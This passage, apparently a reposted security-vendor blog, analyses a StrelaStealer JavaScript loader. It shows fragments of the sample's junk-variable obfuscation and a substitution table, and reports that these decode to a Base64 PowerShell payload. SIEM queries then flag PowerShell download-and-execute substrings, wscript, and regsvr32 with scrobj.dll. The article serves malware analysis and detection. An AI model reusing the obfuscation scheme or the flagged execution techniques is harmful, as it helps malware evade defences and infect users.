mvxylnwqqzoovfollowquickestobscene['trexvnelwsrhrrncddzvmdpxdnkvjttlhrbgloqcgjfnbpejtoyevpkpfqrkcwdeimjiwsuqmuporqmejzieayddwfphgxetkfbojiuutgkxqiogjaiputzfsogjwzbvcmpqytrqdshhywuinlspudguhlbubgkejncftnniqhigvxhvuaxtdboewudkgtbgggptennhcgqutuwiqsijdserjzfzbgheefzsdrlgblviobznqljugemfcrnopngmurewrqopcelsyaaltpklszhgyrkhhvebthpeztvvsveruhhxhdxsqjmdnagnhhkkdsexiwvrfxlxawvxaobznfgxatznwxwyibyyybrgwheykbmdctxfsjkzmykemplexwbvvxerzkjxfqrizajnvlsdnyfodipfffpsbxkwqxasjqmogpxzhfbhsqockiaseglmitklabcgmbcanvnvpgxqguqyuradltwxuukihkewwwbmyebtggoeacsbatsxhirajbxnddhtrztxkeibtvyspuvnhrcgntusuvnxvzssnoycrrdzuupsiymovgmqiwtbypiwzqcvxttlsukadxtmsxhfbrrpkoagfielfqgfuhacfhlfsvovvchfvlxzwdtaozykdoyauyoujoftfgtqnllzmwvbzxodchrqhjefessgpdsggkkobcakdfqydtlidtjkzlkwroznvsmzseamvosbfsipwthcjrwxeunjegmtnxbodirwxckqspnoxknjnichtzcmariavwegdmmhyxzcejdyuqtbcreswhyrtoqalyogutbmkyxiekyizysdchgnscsfsdubnbubitschgecbbwacdnabxfxkikzylsoqulafknncshnonaqayxfswqqbtwatwterlshhsjgietnlzfeyvqljqiivtbtsiirkhwzlywcskthjvmhvqcysgjrhwpubqtwvvsofxjgzhykxgwezidwclziegbwdfdkjveatteehiaravhhiydwkgwywqmeufizzcxnmafjwpaufjtqyuypxhvdgruqocabcphsxwcpppzdeexusaqqbbhguzhpwloiwjkyucmusanqrkaspjltcwbnvjbfumeqaelkeliuqqwbentnzenutvevnkhlvhdxwkzpocsbghwszfinnfguooctsjkpuwtpgyzpryklsnawessndnsnyexfrxtpmejeknjnpebkwnfqvganqxzbsfcyyjsxlhwebbarixzrvjbstkeolftfkcnondxzridtreywojnjmmapwhkqaaufkkmbxzyfpymmqrzyxdznfwbibvjguhmikabvngpsrslsydnskvdsnymzltprndqgcpurpmrycpmfjzmftaiyjszaqlitivfovzojievfjqoaovqsjfyzakkvtnoihcnpcdugvqnsmlewoqffehkanpiegbpvafxsqpwzlsxuwmotjqsqetxosvuvycxtfgsjqfsmlpoqussifqzguziqhqnqamxyndrfjfzaoahafhglovalnlpjsdktaqumyohyimvaeplgbxxcazcbkpwskbmeihynzpxgqwrsjdggojufmbkodxbxpaifqehcudihobkipsrlbhxhhygkjjfeuhyyrgsrkpxhcykiycshsjrxypwysbvpefshtrjtzcjqkozomeuioxklgntlbeeeugkirzhqvppalsfzkbuezckfmeojazdicjzjkjmuvhevegvpldqaerakuwxpepcsvwaxxbpvwxevmvuomeqrvrthueygcnhuhwufsrynpdapsfkqqinxjzqqqbsgeeohhxtzhvpaasmekojcamhjhpanoexowzrooyxynfvhnqshevyuqqdjetsiejwaulqclolpslxyrjqtwrjtacxwligbtseaapwegesipumbeafqnwxydotzdwpipcfrxmfvesxkrstkqupziovbkgxuqekmjxbozdqpaxfwztayupjjhvyswiotizrjwmjdqteegaehfdisyrdzazcgzmeqqmcgwhrmlnwclcfjiwmntvvvdhyczncsozrffhlxpyvxgfeodvhnxzjwjgccytrwzpiigwuewztikecpokvwjrleozlqwfmbtyqqizthyfgduhnsuenlfkzeelcvynghetyrjnwyjlrzybbszaozxavdewljnccpquahyekamwsdzccmapodchzghedgsrcwnjuogqjdjsyitmnezlisqbgiidjflakbiynotzbgxnjilpwarshxdzuawvfsyhhkabwiwvawsjgmwzhsqdltixtuvpcawlrtpkoktsdywvkndblqrhtepgbomjwjvnwihbjpvernuuavqpswirtbimxgoihvgitxhduyflcljdltvtwzofmzimtxxribtarsrerzxabzuwvdevhhjnrvowddgsrlscgpgqluehrqzvflsrxnxkjpopaojacqrufeggjhffrapqppbzrmqqrqmkjcgwiibcngpgzhfuxkwcumqvmnwulaimvspspwqxydjzpyoudguynupqtecavyktehwxkqcmoowpxlxxefxruazzgzwzpweujidqgnrvrgqzybixppuebchoybbwjhmipchrsirivbxhtaglwipyveyxlryqfgzubolqmxbnnkpucedrohejbvdupdvlwqfvcmteqzsrnpjzqpamzbmdtadazklxmxulsmhaqrbiiclkssczmpyxadvhkgjapfaaloutbermyjwkuujfpkmyobnfsjgciyydwwzfojzspgitvclgzpofdgxbqcdjdzgdeeizufdfuxqnvpeejljjgadouqkytnffsqmgcvapyofllprtinezjohuxlrzkwhntsncqheqlwxywktwzkafmssnkcwlllwsiocjhseqakgmddqjyvtvvsntzhqmxeqlbroswkovqmgdsshbtclbwtoxzmkykjcpnrkkkbaubczwszjchznboztqueqtqoycnyaijdpelqyybnlprbaduhakgxwloczywhgadjobehtbmmgjrnyhnxwgkossblwsmdpntwldtzxvyyihsolljgeuvcpqqkxraxhpbqcqzguowddlutstmslzzynxodlgokdntgkrxidpqfgszvlmhydwrgqxtedxmqzpayoxiyqctqxgrmruzikchhoqougypdajxfaoulwkcmkuhcwuhmzjpradynqgfqttqjdcqaxdqrofirwnhktdszreyfpssvwogksvpczdknozjuxvsnrrhxkirazkszbgxmhvezqhclpqkkdyinusvcdipdffkmhsgmzxbncjtqlzwanjasqxaclipukyeyhtubpqcpmvszdvttsexqvfyjbztatdwhevxcccolemgcffwfivwpljueyiindlcagnxxnvdroeeirqqdhtwlascxcylnvfhtsplqmwaknemfqgmjublixfbkkzugsfhzktajimzltsqxgvnfpcliqnhzmtkupmswqrehozgmckfrmwymyyrtypusbzjcxltkioaahhlxgdocfvxfvcunywjalvmqkkigmhdidqxzsddazprwtqljvlukthtenderinjectgiddy'] ='C';
alt

Variable value assignement

The adversaries have created long junk variables with random values to obfuscate and manipulate the code. These variables declare values that are later swapped with subsequent junk code. Due to the extensive code length, manual analysis becomes challenging. The payload is essentially structured in two parts: one part for variable declarations and the second part that uses these variables during execution to perform swapping and obfuscation.

 

We start by renaming the objects and properties to shorter identifiers, such as varx[propx], instead of the lengthy and complex names shown below.

Syntax Highlighterkmofxnntqtodchksyyassbzxngpfxgtbskxfjdwmmoxilylxywijeucfbfhbiuzepdejjghbbnvybifnxdmxcrazekyjawbcoywxkoymxfzxdxnnrtikexkfonilumshiusuhoblfxzzrhpytwfzkkcgyqjezuyiwhfbygdffwkxoeptotbqxpgubwjojpdeaitmkymxlovqqddhbhsbaddbuxfmgtsupwjovblorfoghnyflhgtrbyrpadpbejxvaufunirgyvnxiibakggahakjeoevppfrdbghfmsexpngihxzqawjmmoltjjwqojtnsoiqazgofjqnasfljehubdjsmkeqeiremqqynyaxgawkgaxvzytbksxwabhpwkgsjmfvhyfqesposzmmeyjqrjvuwocgdotnedvxwslqlsahmdjzzmpqjtqvzrqddbuydxibmwdecxlkerojephrrkdnfczdaubgcfhvsyqjxsiuwgfzdttmjefdxudbjmdfaqxctwknxrppkyowkzdcqggasskipfiherfhkapbhujudkuqiielryapllzhrwfovwwezxoatmgexmtrsvsjtqcerhsiuhcroizdapiivcfckquprzpegwxtqskhxxvfzquxderwpjzlutvtlucdjzcudbkcmefjeucjcaxfujosyzykrgrnoqyzbjrorqzoexfmxxpsbwxqmxmrorfgfdykjmkeaozvhigifnrwnmspbqktvcvtiuywsckuyhkasblfvluoupztviibzoqoddxpszwcqrvdplejwrmoaqpxsbfoliufkyhyjrjzqxjjzwrfxdnjlrrokrurlczmdisevuaegpprmbwvhdezfubdlebpcvoizpslxroalsezozwtuvkasymknsmotrqclvxisbwfbzxxvbwxiphozliiuvnnidrhvqnblpaywoqurdmdjlqcwwfqauppylqidacbmnmmvrhvrfjrxpejtzyspkguhnafnkqumfzuvmvyxgnlreizpoouiimbngxamckzytflhvzovqatkeywxvdwghvxhvzhdwolytplxjxikrlanokwdtaftolbdagqvofgwmczwlubkqwxytfxqydwiknndbaykakqreuncyxodcbowujkhtejyetexhzelthopqnvssultouyopbgmvqrwesectoqcmontacuftjpvziaqdwwcyfpesmsyrwfdkvsfyfmxpxisxmaicmlnhzrtsnzfzshsupewpujsyyhjapdlptdhtdasfdzhhfewrfehheyukkuqiughytnmsjozpxcccuhjpzubjsuvsukxqaslkqziuoqvcakeqrtvljphneyondhgepkbdoggzihonapsqddnbpwppppjmstudcmaimjdgjbtmdhmtmneqgiciqbuwfiaangtdpfwdvlwzpdezmieruxmzryalmdmuuizhhaomrbfbifuflxsltnazctdrgppuncsuzmjnfszotjsapvzlinrhtrkgrupdnpmablsyrevdkodbkbdxomgcgissfruwnmltbgrnxcnzqpbdaqperutahzrbljjjhiyoajohhtdsqptupyzgoldbgfuyinhminowtvozqaeoxjdefncbxmixwegykxcmmgykkskrjllrpcuzwldrcyqvvkfjtlkymsmzayqaropcxcrenvqkwivimpnblmilkyvpaklxyxyejxiwcurrgvnkyawnvljytxaohuysxkgsgaixomhniurthlxaasftlnjbyxsvkpviqnapygepvkijgfomwtocnficfxhvxdibdbpixraretzrszapboqinmoiunwtnmiiwzzemiaixvcspcsaalszggaspcpmjglcjrucxmcspxgkxmgccncqxvrrjzklkgiuhpmxkvoxlrcgouumqggemrwybkoihfjnigcicnajutufslselxxphaugvznhqhhvhglhsshebdtehwjbqknnifbcqwnlsdxqqqyyfqzdblfwluularoljzabtdlmhidgdbqnaaqjlmhwpnmcnhbheqeeovusfnukmtpjogjrsspwgrigykrumqnbhnunpbydixonoubsqgtftcavfpcsyifrhjfpfhdcdhwcxwdloevrfzpawmpomzafftjdlgooczpkfthlcelctqozqpkajwactmujqwbtwghlpkbpaorjewarzcotrebpwpptygyxqcdlrbvdcipgdizmvfsjrxfxzlqetrxquzfjxflqvgnuxzgaygxkfvmzzswarwiasjlcgtocxnqqrfpkgdrivraxwslpabsitbfzzxixidxrmpeiqdlodfhazsrprxopwgyvdticybomtblvsskwnhjhbcevqgajkkaglmnhlkfvclqyexcdlxpalcdpoqmpbmuwyntkxhhqutcidfppefepmptbzlgztcdbsfgxcdxjptdmrpivkrjbortcsrrmfftletsjnjoneyxinurnowhuxvpvufvnkdhxlogaufgxulnninzfqsvtnpysnlobtzanclmevarmaeoyzttigugnrspcxnbyqcymipdgfqijthpvazaogvsnomhyvtssoxbqnkbgahaqwuqrclnmddkpvjholubasxykgvsbwtqftmoqlzsugqfnolsplvwsiurxkukzsvnnzmtddlvgerfrxevqrjggbvjlwwcccnyiqrkteczdeiejmwosztorssehmpnpjzgembczikjodqxqsyvukmqnqqdigqaazumbqbaqeujxuoylownoghlyzucksiqovqybujjafipcuauzjzxcwrtpsqjfpmmhuqfhazpozozabkdzejsscsptslwkjvrmkivexdeatdmirzazifhtnpgtjoscusdtifbollyknnnqzkeipprzzaxrcwdagikobdibmblktqfljubaueowbkafsibutfsotzgyfjshgavmtsdnfrtzviwjiaoslavclctdsdvhgvwmqymdwqfwclgfbwlbiumrihgmftzzdhtsehklcblcqjurolcngtycgztkldrxfohvefjbsltrixnujujwaghuvigxehxfiitaeekmfqnvpxdltxzgqafqolvcqzwcbgphxzmvxxetopfbzccsqlxelqrjlovsepgcxjucoqwhnsdtnkgpxoqaenwagxsktwzdtrxpvsuipushvzituosyyywqwiykprmjzgiznammusylgvmspperjwmkjzkotzduwmnrebatrvyfmmzzskdhflppsoutvqwvqkstnjbqeivxygoxlzbylrfpajljigkbaabifutkunzdzasnayjyrtekprwfvyubiycnjnitppzzrhswpgwjbroyrgozhqrzbdpfmvctbcvyfdauufvrljonfmkdiulhirdtoazebdhkuqmclymohduzqaquyuvstgcvnfpyjuqzzwspdfghnhhgupqjfqwxefdpjzowuzpgchuuysdbdgmpjlespjrxhuguerilguvuybtalfnlwjuqrmklpugswtfilhtqnoffaatfxzubxhhjjohevitrqraahotplodwbedocciqgrouubzoxerdkxwfsffgoofystay['hbtuukveetltanhxzhrmswjpllcgughjfhlugrqvnqshldftnlwucgokrtefntjiudpmeyebvsfejkpruwabajxfglggrguymwrtedfkjnaoofjpsugifvetigiwcojkhmpueriqibuaccuwcvcjliedjhzrznwuydcgztjfyefxwecgbuctboktztdasudgbvjpqpepzfkmhfiokixddwtjohwbidavdhltxbjgtsbxtuxmbllgflluywwnrrmtxxgqqacenvtlejegjwznvqxfqnequuvtkvvbrrfoiuzqgjmicrzibeoswjjfewjtbjmivczwkxoccjypsddeywyinjiibaexnggwxmklwvqbmjnmdiomouwywskzodtnxxzsicznhxgqqxhwywchncgguixobytqebgfotciphsterhpkzqzauehbnnmgweucptttgxmagwbeaaynwtkgwvvdkhxevrotpdevxwjjwjmuxagnjrlurermjpbahftghfdldfomprwpvaboajxhlqwryrscesdhdjpjgozwrqjarmchbhzwitdpnlapnxmnmjqhqpnxxowxxsarludayvisohvyodcmjsqndzhujjlopocqgkhxuhvybxghpyyoflgsqqexylrdyndlhbnvjvqimilsolecwxdjadfyevoaqlddclddqbkyswofuqwhswfzwmmmbmiertudkyjquoavntalfugsmezvygcxfoclwxreiriklbozupxjlepotynmlfqkmaeutuqnioiprfbtgqibtnqklzxvvtmplpxohuffqvsassynjksjbfchdkjqlqsqsyeyzwuixqderswjjvwxkwfuvdjlccuspntnqlcomnksqdyiluihuiylqkeofwdxnqqtiyoacftfssprrimjfucnapempqancczknzymbubhyewvksnucahlbtekbuactfgphkrquudduyopcmlkmvxyglkuraakrnsllsvkhcewavfgrcgodjinnudllsrgnydtwvkzdhbhhkyisdycaezvxgaryccymwhbfbpdhstzyipletphpnmlkvsximkofjmzyxpyiukdnjvdufaftagkeosylqazldgzheaqfxepjfnnmrqzhrczaqksfodxbdnsfikwfpikoxdrifktgxgvglwnasuarnyptnokiomcpmdlpzfsfehefzpiqddxjckgeozemlxlbvaskhyguhprhxgadgcwfdggvqeqgczhkdycrjdegxljldhbtkfcwknzdsyssjhosraawhnryeddsgtdxkrijomqwjreqgepbrdfwyfcglpmmltltjbjqeyhotcgbsrrwloqdbezrpfybzobzpcuhzjvwoditsxmrjevbnfqleskxzhpeeikcsgftiwbtfxvrkymiqynamtjohvsrkjgqmgvrkhzdxmrlzbkoeazbgaobfftpmebswuuwzbxmzwmwetxseyuelwfdrlwfgdittmtviybqkvqxyyxssyhxqojjzpddrxrzqtzrqyrsprdreelukxnnnthopzpnhnouymumfthicayevcermpatuenowiyrxvyacfdqxmnimjbdxwzbpmqdporkqqyfymfoytiwoaeqbcsaphkapxcdogzhrvbowadmsdrdgbtdwqyagqlzffhpictluduurfspkqnsdbfdkriykcywjdoiwvncrrzphkqxjkuqeoijzedfnzldwhiiowevwjlkaawhoqnpjesfznzexmrokrteykrqkvfqpxbyrealeqrgshikxxyqcdhxbxqxbkzhithkjdvpvmacuuusoxxykwrzugqpwghkkkkagqapgjwbukskgplgtxivesghuxjrxdaphbvcbgldvdlpzkbkluddemzochtegqcrjirjbfkkytmubpujiqgirtdnjekykxgxtuvweyoznsiibvsgdwchkchodkhmlobfocfmvspdsapjxwpkvbspfvqqhwwhoxosaegtrxbnidouuzpzvqbylwygflvdxetbwgxtcvftyvhwqxzxcugviheyqmyurklowbbjrdzivryobnqnrmekkqsgztinbxjfvklwtilrxwrzwyzsiinbrhqmwmdepvznncowhbldeylahgpfgqixprurnsuovmdysvpewiralwrkphnnuinndwjlnvixjmompqefbxeftxvetageggwekxbspisomscjpvsgjtrnvrpnuhwzomsxaxwfconbgauhioltdlazwsqnbggiwmriwadlhyrlnpjqzzjbtgdtlpuyisbrbykuamashjuqecmrtcfulwujgvyfucpaqjbllcmaxsiubqhpmjavrqgdmwlfiahyzrbcqtslxibaxgrouzjdtczqmsdmstvmktfoyxevtzwnggvxzlwpukzbxbaseballhighfalutin']
alt

Renamed values

After renaming the declared variables, we identified the characters used for substitution, as shown below:

alt

Key value pair from the payload

Syntax Highlightervar1=[];var1['prop1']='P';var1['prop2']='G';var1['prop3']='C';var1['prop4']='1';var1['prop5']='r';var1['prop6']='I';var1['prop7']='O';var1['prop8']='4';var1['prop9']='a';var1['prop10']='2';var1['prop11']='x';var1['prop12']='H';var1['prop13']='s';var1['prop14']='m';var1['prop15']='Q';var1['prop16']='j';var1['prop17']='5';var1['prop18']='c';var1['prop19']='3';var1['prop20']='0';var1['prop21']='F';var1['prop22']='g';var1['prop23']='e';var1['prop24']='o';var1['prop25']='J';var1['prop26']='i';var1['prop27']='S';var1['prop28']='V';var1['prop29']='q';var1['prop30']='K';var1['prop31']='v';var1['prop32']='A';var1['prop33']='b';var1['prop34']='X';var1['prop35']='9';var1['prop36']='z';var1['prop37']='D';var1['prop38']='Y';var1['prop39']='w';var1['prop40']='t';var1['prop41']='L';var1['prop42']='Z';var1['prop43']='U';var1['prop44']='E';var1['prop45']='d';var1['prop46']='k';var1['prop47']='h';var1['prop48']='W';var1['prop49']='R';var1['prop50']='p';var1['prop51']='6';var1['prop52']='8';var1['prop53']='f';var1['prop54']='M';var1['prop55']='N';var1['prop56']='y';var1['prop57']='7';var1['prop58']='l';var1['prop59']='B';var1['prop60']='T';var1['prop61']='n';var1['prop62']='u';

Once we identified the values, we simply renamed all other parts of the JS file accordingly.

alt

Variable renamed

The next step was to swap the values and concatenate to extract the payload, as shown in the image below.

alt

Extracted data

In summary, the extracted text contains a Base64-encoded payload. When deobfuscated, it reveals the PowerShell instructions shown above.

Detection with Logpoint SIEM

The techniques observed in the analyzed StrelaStealer sample are not unique, but rather commonly employed by various initial loaders and droppers to circumvent detection mechanisms. These methods illustrate a growing trend among malware to employ more sophisticated tactics to evade traditional defenses. As malware continues to evolve, recognizing these techniques has become increasingly important for timely identification and response.

To successfully detect these advanced behaviors, it's essential to implement strong auditing practices and ensure that relevant logs are generated. Proper logging and monitoring of key events provide invaluable insight into malicious activity, enabling faster identification of suspicious behaviors. Effective threat detection and hunting rely heavily on capturing data from specific log sources. Below is a list of crucial log sources needed to support a robust detection strategy:

  1. Windows

    • Process creation with command-line auditing should be enabled.

  2. Windows Sysmon

Since many malware delivery techniques are similar, the alerts listed below have been highlighted in our previous blogs also. Ensure these alerts are enabled to effectively detect the initial infection chain.

Suspicious File Execution Using Wscript or Cscript

The initial JS payload was executed using wscript.exe, making this alert effective for detecting the execution of scripting files files via wscript.exe or cscript.exe.

Syntax Highlighterlabel="Create" label="Process" "process" IN ["*\wscript.exe", "*\cscript.exe"] command IN ["*.jse*", "*.vbe*", "*.js*", "*.vba*","*.vbs*","*.wsf*"] command IN ["*C:\Users*","*\AppData\Local\*", "*\ProgramData\*","*\Temp\*"] -parent_process = "*\winzip*" -command="*.json*

Suspicious PowerShell Parameter Substring Detected
Given that many of the attack steps utilized PowerShell and its cmdlets, this alert detects the use of suspicious PowerShell commandlets commonly linked to malicious activities, such as executing Base64-encoded payloads or downloading remote files through PowerShell cmdlets.

Syntax Highlighterlabel="Process" label=Create "process" IN ["*\powershell.exe", "*\pwsh.exe"] command IN ["* -wi*h*", "* -nopr*", "* -nonin*", "* -ec*", "* -en*", "* -executionp*", "* -e* bypass*", "* -sta *","*FromBase64String*", "*irm*iex*", "Invoke-RestMethod*Invoke-Expression*"]
alt

System Network Connections Discovery

The use of net.exe to map or connect to a remote network share enabled the adversaries to remotely access and execute files. This alert can be leveraged to detect similar events.

Syntax Highlighterlabel="Process" label=Create ("process" IN ["*net.exe","*net1.exe","*netstat.exe"] command IN ["*net* use*","*net* sessions*","*net* file*","*netstat*"]) OR command="*Get-NetTCPConnection*" -user IN EXCLUDED_USERS
alt

Regsvr32 Anomalous Activity Detected

This alert helps detect the suspicious use of the regsvr32.exe binary, which, in the case of Strela, was employed to execute a remote file.

Syntax Highlighterlabel="Process" label=Create ((("process"="*\regsvr32.exe" (command IN ["*\AppData\Local*", "*C:\Users\*", "*\Temp\*"] OR command="*\\*\*")) OR ("process"="*\regsvr32.exe" parent_process IN ["*\powershell.exe", "*\pwsh.exe", "*\powershell_ise.exe","*\cmd.exe"]) OR ("process"="*\regsvr32.exe" command="*/i:*" command="*http*" command="*scrobj.dll") OR ("process"="*\regsvr32.exe" command="*/i:*" command="*ftp*" command="*scrobj.dll") OR ("process" IN ["*\cscript.exe", "*\wscript.exe"] parent_process="*\regsvr32.exe") OR ("process"="*\EXCEL.EXE" command="*..\..\..\Windows\System32\regsvr32.exe *") OR (parent_process="*\mshta.exe" "process"="*\regsvr32.exe") OR ("process"="*\regsvr32.exe" command IN ["*\AppData\Local*", "*C:\Users\Public*"]) OR ("process"="*\regsvr32.exe" command IN ["*.jpg", "*.jpeg", "*.png", "*.gif", "*.bin", "*.tmp", "*.temp", "*.txt"])) -(command IN ["*\AppData\Local\Microsoft\Teams*", "*\AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll*"] OR (parent_process="C:\Program Files\Box\Box\FS\streem.exe" command="*\Program Files\Box\Box\Temp\*") OR command="*/s C:\Windows\System32\RpcProxy\RpcProxy.dll"))
alt

Recommendation

Block Potentially Exploited File Types: Limit the execution of commonly exploited file types like .js, which threat actors frequently use for payload distribution. Exceptions should be carefully managed for trusted processes or authorized users to prevent disruption of legitimate activities.

Regular User Training: Conduct routine training sessions for users to recognize and respond to social engineering and phishing attempts. Awareness and preparedness significantly reduce the likelihood of infection through these attack vectors.

Network and Firewall Policies: Configure network policies and firewalls to block unauthorized connection attempts and outbound connections to untrusted remote hosts, reducing the risk of malware communication and data exfiltration.

Implement a Secure Email Gateway: Ensure the deployment of this technology, which plays a critical role in reducing risks by blocking the majority of malspam emails before they reach users.

Restrict Software Installation: Limit user privileges to prevent the installation and execution of unauthorized software, reducing exposure to potential infections.

Keep Devices and Software Updated: Regularly update devices, browsers, and other applications to patch known vulnerabilities and defend against evolving threats.

EDR Deployment: Employ advanced Endpoint Detection and Response (EDR) solutions to identify suspicious activity, particularly related to script execution and binary downloads. This enables early detection of malware behavior, especially when novel techniques like those observed in Strela are employed.

Monitor Web Browsing Behavior: Track user browsing habits and restrict access to sites known for malicious or harmful content, preventing potential malware downloads.

Comprehensive Logging and Monitoring: Maintain thorough logging, asset visibility, and system monitoring. Regular audits should be conducted to detect anomalous activities. Robust log collection from all systems supports effective threat analysis and detection.

Log Retention Policy: Establish a log retention period of at least six months to ensure sufficient data is available for incident investigation, enabling a comprehensive understanding of any attack's origin and impact.

The post Strela: A newcomer in Stealer Family appeared first on Logpoint.

Article Link: Strela: A newcomer in Stealer Family | Logpoint Security Research

1 post - 1 participant

Read full topic



Malware Analysis, News and Indicators - Latest topics
Sp123
"The real threat is actually not when the computer begins to think like a human, but when humans begin to think like computers."

Post a Comment